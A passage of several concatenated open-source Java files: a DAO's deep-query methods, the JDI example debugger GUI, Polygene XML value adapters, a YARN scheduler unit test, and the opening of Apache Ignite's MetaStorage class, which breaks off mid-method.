assertSinglePk(); if (key == null) { return null; } StringBuilder builder = new StringBuilder(getSelectDeep()); builder.append("WHERE "); SqlUtils.appendColumnsEqValue(builder, "T", getPkColumns()); String sql = builder.toString(); String[] keyArray = new String[] { key.toString() }; Cursor cursor = db.rawQuery(sql, keyArray); try { boolean available = cursor.moveToFirst(); if (!available) { return null; } else if (!cursor.isLast()) { throw new IllegalStateException("Expected unique result, but count was " + cursor.getCount()); } return loadCurrentDeep(cursor, true); } finally { cursor.close(); } } /** Reads all available rows from the given cursor and returns a list of new ImageTO objects. */ public List<PokemonForms> loadAllDeepFromCursor(Cursor cursor) { int count = cursor.getCount(); List<PokemonForms> list = new ArrayList<PokemonForms>(count); if (cursor.moveToFirst()) { if (identityScope != null) { identityScope.lock(); identityScope.reserveRoom(count); } try { do { list.add(loadCurrentDeep(cursor, false)); } while (cursor.moveToNext()); } finally { if (identityScope != null) { identityScope.unlock(); } } } return list; } protected List<PokemonForms> loadDeepAllAndCloseCursor(Cursor cursor) { try { return loadAllDeepFromCursor(cursor); } finally { cursor.close(); } } /** A raw-style query where you can pass any WHERE clause and arguments. */ public List<PokemonForms> queryDeep(String where, String... selectionArg) { Cursor cursor = db.rawQuery(getSelectDeep() + where, selectionArg); return loadDeepAllAndCloseCursor(cursor); } }
/* * Copyright (c) 1998, 1999, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package com.sun.tools.example.debug.gui; import java.io.*; import javax.swing.*; import javax.swing.border.*; import java.awt.*; import java.awt.event.*; import com.sun.jdi.*; import com.sun.tools.example.debug.bdi.*; public class GUI extends JPanel { private static final long serialVersionUID = 3292463234530679091L; private CommandTool cmdTool; private ApplicationTool appTool; //###HACK## //### There is currently dirty code in Environment that //### accesses this directly. //private SourceTool srcTool; public static SourceTool srcTool; private SourceTreeTool sourceTreeTool; private ClassTreeTool classTreeTool; private ThreadTreeTool threadTreeTool; private StackTraceTool stackTool; private MonitorTool monitorTool; public static final String progname = "javadt"; public static final String version = "1.0Beta"; //### FIX ME. public static final String windowBanner = "Java(tm) platform Debug Tool"; private Font fixedFont = new Font("monospaced", Font.PLAIN, 10); private GUI(Environment env) { setLayout(new BorderLayout()); setBorder(new EmptyBorder(5, 5, 5, 5)); add(new JDBToolBar(env), BorderLayout.NORTH); srcTool = new SourceTool(env); srcTool.setPreferredSize(new java.awt.Dimension(500, 300)); srcTool.setTextFont(fixedFont); stackTool = new StackTraceTool(env); stackTool.setPreferredSize(new java.awt.Dimension(500, 100)); monitorTool = new MonitorTool(env); monitorTool.setPreferredSize(new java.awt.Dimension(500, 50)); JSplitPane right = new JSplitPane(JSplitPane.VERTICAL_SPLIT, srcTool, new JSplitPane(JSplitPane.VERTICAL_SPLIT, stackTool, monitorTool)); sourceTreeTool = new SourceTreeTool(env); sourceTreeTool.setPreferredSize(new java.awt.Dimension(200, 450)); classTreeTool = new ClassTreeTool(env); classTreeTool.setPreferredSize(new java.awt.Dimension(200, 450)); threadTreeTool = new ThreadTreeTool(env); threadTreeTool.setPreferredSize(new java.awt.Dimension(200, 450)); JTabbedPane treePane = new JTabbedPane(SwingConstants.BOTTOM); treePane.addTab("Source", null, sourceTreeTool); treePane.addTab("Classes", null, classTreeTool); treePane.addTab("Threads", null, threadTreeTool); JSplitPane centerTop = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT, treePane, right); cmdTool = new CommandTool(env); cmdTool.setPreferredSize(new java.awt.Dimension(700, 150)); appTool = new ApplicationTool(env); appTool.setPreferredSize(new java.awt.Dimension(700, 200)); JSplitPane centerBottom = new JSplitPane(JSplitPane.VERTICAL_SPLIT, cmdTool, appTool); // centerBottom.setPreferredSize(new java.awt.Dimension(700, 350)); JSplitPane center = new JSplitPane(JSplitPane.VERTICAL_SPLIT, centerTop, centerBottom); add(center, BorderLayout.CENTER); } private static void usage() { String separator = File.pathSeparator; System.out.println("Usage: " + progname + " <options> <class> <arguments>"); System.out.println(); System.out.println("where options include:"); System.out.println(" -help print out this message and exit"); System.out.println(" -sourcepath <directories separated by \"" + separator + "\">"); System.out.println(" list directories in which to look for source files"); System.out.println(" -remote <hostname>:<port-number>"); System.out.println(" host machine and port number of interpreter to attach to"); System.out.println(" -dbgtrace [flags] print info for debugging " + progname); System.out.println(); System.out.println("options forwarded to debuggee process:"); System.out.println(" -v -verbose[:class|gc|jni]"); System.out.println(" turn on verbose mode"); System.out.println(" -D<name>=<value> set a system property"); System.out.println(" -classpath <directories separated by \"" + separator + "\">"); System.out.println(" list directories in which to look for classes"); System.out.println(" -X<option> non-standard debuggee VM option"); System.out.println(); System.out.println("<class> is the name of the class to begin debugging"); System.out.println("<arguments> are the arguments passed to the main() method of <class>"); System.out.println(); System.out.println("For command help type 'help' at " + progname + " prompt"); } public static void main(String argv[]) { String clsName = ""; String progArgs = ""; String javaArgs = ""; final Environment env = new Environment(); JPanel mainPanel = new GUI(env); ContextManager context = env.getContextManager(); ExecutionManager runtime = env.getExecutionManager(); for (int i = 0; i < argv.length; i++) { String token = argv[i]; if (token.equals("-dbgtrace")) { if ((i == argv.length - 1) || ! Character.isDigit(argv[i+1].charAt(0))) { runtime.setTraceMode(VirtualMachine.TRACE_ALL); } else { String flagStr = argv[++i]; runtime.setTraceMode(Integer.decode(flagStr).intValue()); } } else if (token.equals("-X")) { System.out.println( "Use 'java -X' to see the available non-standard options"); System.out.println(); usage(); System.exit(1); } else if ( // Standard VM options passed on token.equals("-v") || token.startsWith("-v:") || // -v[:...] token.startsWith("-verbose") || // -verbose[:...] token.startsWith("-D") || // NonStandard options passed on token.startsWith("-X") || // Old-style options // (These should remain in place as long as the standard VM accepts them) token.equals("-noasyncgc") || token.equals("-prof") || token.equals("-verify") || token.equals("-noverify") || token.equals("-verifyremote") || token.equals("-verbosegc") || token.startsWith("-ms") || token.startsWith("-mx") || token.startsWith("-ss") || token.startsWith("-oss") ) { javaArgs += token + " "; } else if (token.equals("-sourcepath")) { if (i == (argv.length - 1)) { System.out.println("No sourcepath specified."); usage(); System.exit(1); } env.getSourceManager().setSourcePath(new SearchPath(argv[++i])); } else if (token.equals("-classpath")) { if (i == (argv.length - 1)) { System.out.println("No classpath specified."); usage(); System.exit(1); } env.getClassManager().setClassPath(new SearchPath(argv[++i])); } else if (token.equals("-remote")) { if (i == (argv.length - 1)) { System.out.println("No remote specified."); usage(); System.exit(1); } env.getContextManager().setRemotePort(argv[++i]); } else if (token.equals("-help")) { usage(); System.exit(0); } else if (token.equals("-version")) { System.out.println(progname + " version " + version); System.exit(0); } else if (token.startsWith("-")) { System.out.println("invalid option: " + token); usage(); System.exit(1); } else { // Everything from here is part of the command line clsName = token; for (i++; i < argv.length; i++) { progArgs += argv[i] + " "; } break; } } context.setMainClassName(clsName); context.setProgramArguments(progArgs); context.setVmArguments(javaArgs); // Force Cross Platform L&F try { UIManager.setLookAndFeel(UIManager.getCrossPlatformLookAndFeelClassName()); // If you want the System L&F instead, comment out the above line and // uncomment the following: // UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName()); } catch (Exception exc) { System.err.println("Error loading L&F: " + exc); } JFrame frame = new JFrame(); frame.setBackground(Color.lightGray); frame.setTitle(windowBanner); frame.setJMenuBar(new JDBMenuBar(env)); frame.setContentPane(mainPanel); frame.addWindowListener(new WindowAdapter() { @Override public void windowClosing(WindowEvent e) { env.terminate(); } }); frame.pack(); frame.setVisible(true); } }
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.polygene.serialization.javaxxml; import java.util.LinkedHashMap; import java.util.Map; import java.util.function.BiFunction; import java.util.function.Function; import org.apache.polygene.api.injection.scope.This; import org.apache.polygene.api.injection.scope.Uses; import org.apache.polygene.api.mixin.Initializable; import org.apache.polygene.api.mixin.Mixins; import org.apache.polygene.api.serialization.Converters; import org.apache.polygene.api.service.ServiceDescriptor; import org.apache.polygene.api.type.ValueType; import org.apache.polygene.spi.serialization.BuiltInConverters; import org.w3c.dom.Document; import org.w3c.dom.Node; import static org.apache.polygene.api.type.HasTypesCollectors.closestType; import static org.apache.polygene.serialization.javaxxml.JavaxXmlSettings.orDefault; @Mixins( JavaxXmlAdapters.Mixin.class ) public interface JavaxXmlAdapters { void registerAdapter( ValueType valueType, JavaxXmlAdapter<?> adapter ); <T> JavaxXmlAdapter<T> adapterFor( ValueType valueType ); default <T> JavaxXmlAdapter<T> adapterFor( Class<T> type ) { return adapterFor( ValueType.of( type ) ); } class Mixin implements JavaxXmlAdapters, Initializable { private Map<ValueType, JavaxXmlAdapter<?>> adapters = new LinkedHashMap<>(); @Uses private ServiceDescriptor descriptor; @This private BuiltInConverters builtInConverters; @This private Converters converters; @Override public void initialize() throws Exception { JavaxXmlSettings settings = orDefault( descriptor.metaInfo( JavaxXmlSettings.class ) ); settings.getConverters() .forEach( ( type, converter ) -> converters.registerConverter( type, converter ) ); builtInConverters.registerBuiltInConverters( converters ); settings.getAdapters().forEach( adapters::put ); registerBaseJavaxXmlAdapters(); } @Override public void registerAdapter( final ValueType valueType, final JavaxXmlAdapter<?> adapter ) { adapters.put( valueType, adapter ); } @Override public <T> JavaxXmlAdapter<T> adapterFor( final ValueType valueType ) { return castAdapter( adapters.keySet().stream() .collect( closestType( valueType ) ) .map( adapters::get ) .orElse( null ) ); } @SuppressWarnings( "unchecked" ) private <T> JavaxXmlAdapter<T> castAdapter( JavaxXmlAdapter<?> adapter ) { return (JavaxXmlAdapter<T>) adapter; } private void registerBaseJavaxXmlAdapters() { // Primitive Value types adapters.put( ValueType.STRING, new StringAdapter() ); adapters.put( ValueType.CHARACTER, new CharacterAdapter() ); adapters.put( ValueType.BOOLEAN, new BooleanAdapter() ); adapters.put( ValueType.INTEGER, new IntegerAdapter() ); adapters.put( ValueType.LONG, new LongAdapter() ); adapters.put( ValueType.SHORT, new ShortAdapter() ); adapters.put( ValueType.BYTE, new ByteAdapter() ); adapters.put( ValueType.FLOAT, new FloatAdapter() ); adapters.put( ValueType.DOUBLE, new DoubleAdapter() ); } private static abstract class ToStringTextNodeAdapter<T> implements JavaxXmlAdapter<T> { @Override public Node serialize( Document document, Object object, Function<Object, Node> serialize ) { return document.createTextNode( object.toString() ); } } private static class StringAdapter extends ToStringTextNodeAdapter<String> { @Override public Class<String> type() { return String.class; } @Override public String deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return node.getNodeValue(); } } private static class CharacterAdapter extends ToStringTextNodeAdapter<Character> { @Override public Class<Character> type() { return Character.class; } @Override public Character deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { String string = node.getNodeValue(); return string.isEmpty() ? null : string.charAt( 0 ); } } private static class BooleanAdapter extends ToStringTextNodeAdapter<Boolean> { @Override public Class<Boolean> type() { return Boolean.class; } @Override public Boolean deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return Boolean.valueOf( node.getNodeValue() ); } } private static class IntegerAdapter extends ToStringTextNodeAdapter<Integer> { @Override public Class<Integer> type() { return Integer.class; } @Override public Integer deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return Integer.valueOf( node.getNodeValue() ); } } private static class LongAdapter extends ToStringTextNodeAdapter<Long> { @Override public Class<Long> type() { return Long.class; } @Override public Long deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return Long.valueOf( node.getNodeValue() ); } } private static class ShortAdapter extends ToStringTextNodeAdapter<Short> { @Override public Class<Short> type() { return Short.class; } @Override public Short deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return Short.valueOf( node.getNodeValue() ); } } private static class ByteAdapter extends ToStringTextNodeAdapter<Byte> { @Override public Class<Byte> type() { return Byte.class; } @Override public Byte deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return Byte.valueOf( node.getNodeValue() ); } } private static class FloatAdapter extends ToStringTextNodeAdapter<Float> { @Override public Class<Float> type() { return Float.class; } @Override public Float deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return Float.valueOf( node.getNodeValue() ); } } private static class DoubleAdapter extends ToStringTextNodeAdapter<Double> { @Override public Class<Double> type() { return Double.class; } @Override public Double deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize ) { return Double.valueOf( node.getNodeValue() ); } } } }
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity; import static org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacitySchedulerConfiguration.PREFIX; import static org.junit.Assert.assertEquals; import static org.mockito.ArgumentMatchers.any; import static org.mockito.ArgumentMatchers.anyString; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Iterator; import java.util.List; import java.util.concurrent.ConcurrentHashMap; import org.apache.hadoop.yarn.api.records.ApplicationAttemptId; import org.apache.hadoop.yarn.api.records.ApplicationId; import org.apache.hadoop.yarn.api.records.Priority; import org.apache.hadoop.yarn.api.records.Resource; import org.apache.hadoop.yarn.server.resourcemanager.RMContext; import org.apache.hadoop.yarn.server.resourcemanager.nodelabels.RMNodeLabelsManager; import org.apache.hadoop.yarn.server.resourcemanager.scheduler.activities.ActivitiesManager; import org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.preemption.PreemptionManager; import org.apache.hadoop.yarn.server.resourcemanager.scheduler.common.fica.FiCaSchedulerApp; import org.apache.hadoop.yarn.server.resourcemanager.security.AppPriorityACLsManager; import org.apache.hadoop.yarn.util.ControlledClock; import org.apache.hadoop.yarn.util.resource.DefaultResourceCalculator; import org.junit.Before; import org.junit.Test; public class TestCSMaxRunningAppsEnforcer { private CapacitySchedulerQueueManager queueManager; private CSMaxRunningAppsEnforcer maxAppsEnforcer; private int appNum; private ControlledClock clock; private RMContext rmContext; private CapacityScheduler scheduler; private ActivitiesManager activitiesManager; private CapacitySchedulerConfiguration csConfig; @Before public void setup() throws IOException { csConfig = new CapacitySchedulerConfiguration(); rmContext = mock(RMContext.class); when(rmContext.getYarnConfiguration()).thenReturn(csConfig); when(rmContext.getRMApps()).thenReturn(new ConcurrentHashMap<>()); clock = new ControlledClock(); scheduler = mock(CapacityScheduler.class); when(rmContext.getScheduler()).thenReturn(scheduler); when(scheduler.getConf()).thenReturn(csConfig); when(scheduler.getConfig()).thenReturn(csConfig); when(scheduler.getConfiguration()).thenReturn(csConfig); when(scheduler.getResourceCalculator()).thenReturn( new DefaultResourceCalculator()); when(scheduler.getRMContext()).thenReturn(rmContext); Resource clusterResource = Resource.newInstance(16384, 8); when(scheduler.getClusterResource()) .thenReturn(clusterResource); when(scheduler.getMinimumAllocation()) .thenReturn(Resource.newInstance(1024, 1)); when(scheduler.getMinimumResourceCapability()) .thenReturn(Resource.newInstance(1024, 1)); activitiesManager = mock(ActivitiesManager.class); maxAppsEnforcer = new CSMaxRunningAppsEnforcer(scheduler); appNum = 0; setupQueues(csConfig); RMNodeLabelsManager labelManager = mock(RMNodeLabelsManager.class); AppPriorityACLsManager appPriorityACLManager = mock(AppPriorityACLsManager.class); when(rmContext.getNodeLabelManager()).thenReturn(labelManager); when(labelManager.getResourceByLabel(any(), any(Resource.class))) .thenReturn(clusterResource); PreemptionManager preemptionManager = mock(PreemptionManager.class); when(preemptionManager.getKillableResource(any(), anyString())) .thenReturn(Resource.newInstance(0, 0)); when(scheduler.getPreemptionManager()).thenReturn(preemptionManager); queueManager = new CapacitySchedulerQueueManager(csConfig, labelManager, appPriorityACLManager); queueManager.setCapacitySchedulerContext(scheduler); queueManager.initializeQueues(csConfig); } private void setupQueues(CapacitySchedulerConfiguration config) { config.setQueues(CapacitySchedulerConfiguration.ROOT, new String[] {"queue1", "queue2"}); config.setQueues("root.queue1", new String[] {"subqueue1", "subqueue2"}); config.setQueues("root.queue1.subqueue1", new String[] {"leaf1"}); config.setQueues("root.queue1.subqueue2", new String[] {"leaf2"}); config.setFloat(PREFIX + "root.capacity", 100.0f); config.setFloat(PREFIX + "root.queue1.capacity", 50.0f); config.setFloat(PREFIX + "root.queue2.capacity", 50.0f); config.setFloat(PREFIX + "root.queue1.subqueue1.capacity", 50.0f); config.setFloat(PREFIX + "root.queue1.subqueue2.capacity", 50.0f); config.setFloat(PREFIX + "root.queue1.subqueue1.leaf1.capacity", 100.0f); config.setFloat(PREFIX + "root.queue1.subqueue2.leaf2.capacity", 100.0f); } private FiCaSchedulerApp addApp(LeafQueue queue, String user) { ApplicationId appId = ApplicationId.newInstance(0, appNum++); ApplicationAttemptId attId = ApplicationAttemptId.newInstance(appId, 0); FiCaSchedulerApp attempt = new FiCaSchedulerApp(attId, user, queue, queue.getAbstractUsersManager(), rmContext, Priority.newInstance(0), false, activitiesManager) { private final long startTime = clock.getTime(); @Override public long getStartTime() { return startTime; } }; maxAppsEnforcer.checkRunnabilityWithUpdate(attempt); maxAppsEnforcer.trackApp(attempt); queue.submitApplicationAttempt(attempt, attempt.getUser()); return attempt; } private void removeApp(FiCaSchedulerApp attempt) { LeafQueue queue = attempt.getCSLeafQueue(); queue.finishApplicationAttempt(attempt, queue.getQueuePath()); maxAppsEnforcer.untrackApp(attempt); maxAppsEnforcer.updateRunnabilityOnAppRemoval(attempt); } @Test public void testRemoveDoesNotEnableAnyApp() { ParentQueue root = (ParentQueue) queueManager.getRootQueue(); LeafQueue leaf1 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue1.leaf1"); LeafQueue leaf2 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue2.leaf2"); root.setMaxParallelApps(2); leaf1.setMaxParallelApps(1); leaf2.setMaxParallelApps(1); FiCaSchedulerApp app1 = addApp(leaf1, "user"); addApp(leaf2, "user"); addApp(leaf2, "user"); assertEquals(1, leaf1.getNumRunnableApps()); assertEquals(1, leaf2.getNumRunnableApps()); assertEquals(1, leaf2.getNumNonRunnableApps()); removeApp(app1); assertEquals(0, leaf1.getNumRunnableApps()); assertEquals(1, leaf2.getNumRunnableApps()); assertEquals(1, leaf2.getNumNonRunnableApps()); } @Test public void testRemoveEnablesAppOnCousinQueue() { LeafQueue leaf1 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue1.leaf1"); LeafQueue leaf2 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue2.leaf2"); ParentQueue queue1 = (ParentQueue) queueManager .getQueueByFullName("root.queue1"); queue1.setMaxParallelApps(2); FiCaSchedulerApp app1 = addApp(leaf1, "user"); addApp(leaf2, "user"); addApp(leaf2, "user"); assertEquals(1, leaf1.getNumRunnableApps()); assertEquals(1, leaf2.getNumRunnableApps()); assertEquals(1, leaf2.getNumNonRunnableApps()); removeApp(app1); assertEquals(0, leaf1.getNumRunnableApps()); assertEquals(2, leaf2.getNumRunnableApps()); assertEquals(0, leaf2.getNumNonRunnableApps()); } @Test public void testRemoveEnablesOneByQueueOneByUser() { LeafQueue leaf1 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue1.leaf1"); LeafQueue leaf2 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue2.leaf2"); leaf1.setMaxParallelApps(2); //userMaxApps.put("user1", 1); csConfig.setInt(PREFIX + "user.user1.max-parallel-apps", 1); FiCaSchedulerApp app1 = addApp(leaf1, "user1"); addApp(leaf1, "user2"); addApp(leaf1, "user3"); addApp(leaf2, "user1"); assertEquals(2, leaf1.getNumRunnableApps()); assertEquals(1, leaf1.getNumNonRunnableApps()); assertEquals(1, leaf2.getNumNonRunnableApps()); removeApp(app1); assertEquals(2, leaf1.getNumRunnableApps()); assertEquals(1, leaf2.getNumRunnableApps()); assertEquals(0, leaf1.getNumNonRunnableApps()); assertEquals(0, leaf2.getNumNonRunnableApps()); } @Test public void testRemoveEnablingOrderedByStartTime() { LeafQueue leaf1 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue1.leaf1"); LeafQueue leaf2 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue2.leaf2"); ParentQueue queue1 = (ParentQueue) queueManager .getQueueByFullName("root.queue1"); queue1.setMaxParallelApps(2); FiCaSchedulerApp app1 = addApp(leaf1, "user"); addApp(leaf2, "user"); addApp(leaf2, "user"); clock.tickSec(20); addApp(leaf1, "user"); assertEquals(1, leaf1.getNumRunnableApps()); assertEquals(1, leaf2.getNumRunnableApps()); assertEquals(1, leaf1.getNumNonRunnableApps()); assertEquals(1, leaf2.getNumNonRunnableApps()); removeApp(app1); assertEquals(0, leaf1.getNumRunnableApps()); assertEquals(2, leaf2.getNumRunnableApps()); assertEquals(0, leaf2.getNumNonRunnableApps()); } @Test public void testMultipleAppsWaitingOnCousinQueue() { LeafQueue leaf1 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue1.leaf1"); LeafQueue leaf2 = (LeafQueue) queueManager .getQueueByFullName("root.queue1.subqueue2.leaf2"); ParentQueue queue1 = (ParentQueue) queueManager .getQueueByFullName("root.queue1"); queue1.setMaxParallelApps(2); FiCaSchedulerApp app1 = addApp(leaf1, "user"); addApp(leaf2, "user"); addApp(leaf2, "user"); addApp(leaf2, "user"); assertEquals(1, leaf1.getNumRunnableApps()); assertEquals(1, leaf2.getNumRunnableApps()); assertEquals(2, leaf2.getNumNonRunnableApps()); removeApp(app1); assertEquals(0, leaf1.getNumRunnableApps()); assertEquals(2, leaf2.getNumRunnableApps()); assertEquals(1, leaf2.getNumNonRunnableApps()); } @Test public void testMultiListStartTimeIteratorEmptyAppLists() { List<List<FiCaSchedulerApp>> lists = new ArrayList<List<FiCaSchedulerApp>>(); lists.add(Arrays.asList(mockAppAttempt(1))); lists.add(Arrays.asList(mockAppAttempt(2))); Iterator<FiCaSchedulerApp> iter = new CSMaxRunningAppsEnforcer.MultiListStartTimeIterator(lists); assertEquals(1, iter.next().getStartTime()); assertEquals(2, iter.next().getStartTime()); } private FiCaSchedulerApp mockAppAttempt(long startTime) { FiCaSchedulerApp schedApp = mock(FiCaSchedulerApp.class); when(schedApp.getStartTime()).thenReturn(startTime); return schedApp; } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.ignite.internal.processors.cache.persistence.metastorage; import java.io.Closeable; import java.io.File; import java.io.IOException; import java.io.RandomAccessFile; import java.io.Serializable; import java.nio.ByteBuffer; import java.nio.charset.StandardCharsets; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import java.util.concurrent.Executor; import java.util.concurrent.atomic.AtomicLong; import java.util.function.BiConsumer; import java.util.stream.Stream; import org.apache.ignite.IgniteCheckedException; import org.apache.ignite.IgniteException; import org.apache.ignite.IgniteLogger; import org.apache.ignite.internal.metric.IoStatisticsHolderNoOp; import org.apache.ignite.internal.pagemem.FullPageId; import org.apache.ignite.internal.pagemem.PageIdAllocator; import org.apache.ignite.internal.pagemem.PageIdUtils; import org.apache.ignite.internal.pagemem.PageMemory; import org.apache.ignite.internal.pagemem.store.PageStore; import org.apache.ignite.internal.pagemem.wal.IgniteWriteAheadLogManager; import org.apache.ignite.internal.pagemem.wal.record.MetastoreDataRecord; import org.apache.ignite.internal.pagemem.wal.record.delta.MetaPageInitRecord; import org.apache.ignite.internal.processors.cache.GridCacheSharedContext; import org.apache.ignite.internal.processors.cache.persistence.DataRegion; import org.apache.ignite.internal.processors.cache.persistence.GridCacheDatabaseSharedManager; import org.apache.ignite.internal.processors.cache.persistence.IgniteCacheDatabaseSharedManager; import org.apache.ignite.internal.processors.cache.persistence.RootPage; import org.apache.ignite.internal.processors.cache.persistence.StorageException; import org.apache.ignite.internal.processors.cache.persistence.checkpoint.CheckpointListener; import org.apache.ignite.internal.processors.cache.persistence.file.FilePageStoreManager; import org.apache.ignite.internal.processors.cache.persistence.pagemem.PageMemoryEx; import org.apache.ignite.internal.processors.cache.persistence.pagemem.PageMetrics; import org.apache.ignite.internal.processors.cache.persistence.partstorage.PartitionMetaStorageImpl; import org.apache.ignite.internal.processors.cache.persistence.tree.io.PageIO; import org.apache.ignite.internal.processors.cache.persistence.tree.io.PagePartitionMetaIO; import org.apache.ignite.internal.processors.cache.persistence.tree.util.PageHandler; import org.apache.ignite.internal.processors.cache.persistence.wal.WALPointer; import org.apache.ignite.internal.util.lang.GridCursor; import org.apache.ignite.internal.util.typedef.internal.CU; import org.apache.ignite.internal.util.typedef.internal.U; import org.apache.ignite.lang.IgniteBiTuple; import org.apache.ignite.marshaller.Marshaller; import org.apache.ignite.marshaller.jdk.JdkMarshaller; import org.jetbrains.annotations.NotNull; import static org.apache.ignite.internal.pagemem.PageIdAllocator.FLAG_AUX; import static org.apache.ignite.internal.pagemem.PageIdAllocator.FLAG_DATA; /** * General purpose key-value local-only storage. */ public class MetaStorage implements CheckpointListener, ReadWriteMetastorage { /** */ public static final String METASTORAGE_CACHE_NAME = "MetaStorage"; /** */ public static final int METASTORAGE_CACHE_ID = CU.cacheId(METASTORAGE_CACHE_NAME); /** Metastorage cache directory to store data. */ public static final String METASTORAGE_DIR_NAME = "metastorage"; /** Old special partition reserved for metastore space. */ public static final int OLD_METASTORE_PARTITION = 0x0; /** Special partition reserved for metastore space. */ public static final int METASTORE_PARTITION = 0x1; /** The set of all metastorage partitions. */ public static final Set<Integer> METASTORAGE_PARTITIONS = Collections.unmodifiableSet(new HashSet<>(Arrays.asList(OLD_METASTORE_PARTITION, METASTORE_PARTITION))); /** This flag is used ONLY FOR TESTING the migration of a metastorage from Part 0 to Part 1. */ public static boolean PRESERVE_LEGACY_METASTORAGE_PARTITION_ID = false; /** Marker for removed entry. */ private static final byte[] TOMBSTONE = new byte[0]; /** Temporary metastorage memory size. */ private static final int TEMPORARY_METASTORAGE_IN_MEMORY_SIZE = 128 * 1024 * 1024; /** Temporary metastorage buffer size (file). */ private static final int TEMPORARY_METASTORAGE_BUFFER_SIZE = 1024 * 1024; /** */ private final IgniteWriteAheadLogManager wal; /** */ private final DataRegion dataRegion; /** */ private final IgniteLogger log; /** */ private MetastorageTree tree; /** */ private AtomicLong rmvId = new AtomicLong(); /** */ private final boolean readOnly; /** */ private boolean empty; /** */ private RootPage treeRoot; /** */ private RootPage reuseListRoot; /** */ private PartitionMetaStorageImpl<MetastorageRowStoreEntry> partStorage; /** */ private SortedMap<String, byte[]> lastUpdates; /** */ private final Marshaller marshaller = JdkMarshaller.DEFAULT; /** Partition id. */ private int partId; /** Cctx. */ private final GridCacheSharedContext<?, ?> cctx; /** */ public MetaStorage( GridCacheSharedContext<?, ?> cctx, DataRegion dataRegion, boolean readOnly ) { this.cctx = cctx; wal = cctx.wal(); this.dataRegion = dataRegion; this.readOnly = readOnly; log = cctx.logger(getClass()); } /** */ public void init(GridCacheDatabaseSharedManager db) throws IgniteCheckedException { dataRegion.metrics().clear(); initInternal(db); if (!PRESERVE_LEGACY_METASTORAGE_PARTITION_ID) { if (partId == OLD_METASTORE_PARTITION) db.temporaryMetaStorage(copyDataToTmpStorage()); else if (db.temporaryMetaStorage() != null) { restoreDataFromTmpStorage(db.temporaryMetaStorage()); db.temporaryMetaStorage(null); db.addCheckpointListener(new CheckpointListener() { /** {@inheritDoc} */ @Override public void onMarkCheckpointBegin(Context ctx) { } /** {@inheritDoc} */ @Override public void onCheckpointBegin(Context ctx) throws IgniteCheckedException { assert cctx.pageStore() != null; int partTag = ((PageMemoryEx)dataRegion.pageMemory()).invalidate(METASTORAGE_CACHE_ID, OLD_METASTORE_PARTITION); cctx.pageStore().truncate(METASTORAGE_CACHE_ID, OLD_METASTORE_PARTITION, partTag); int 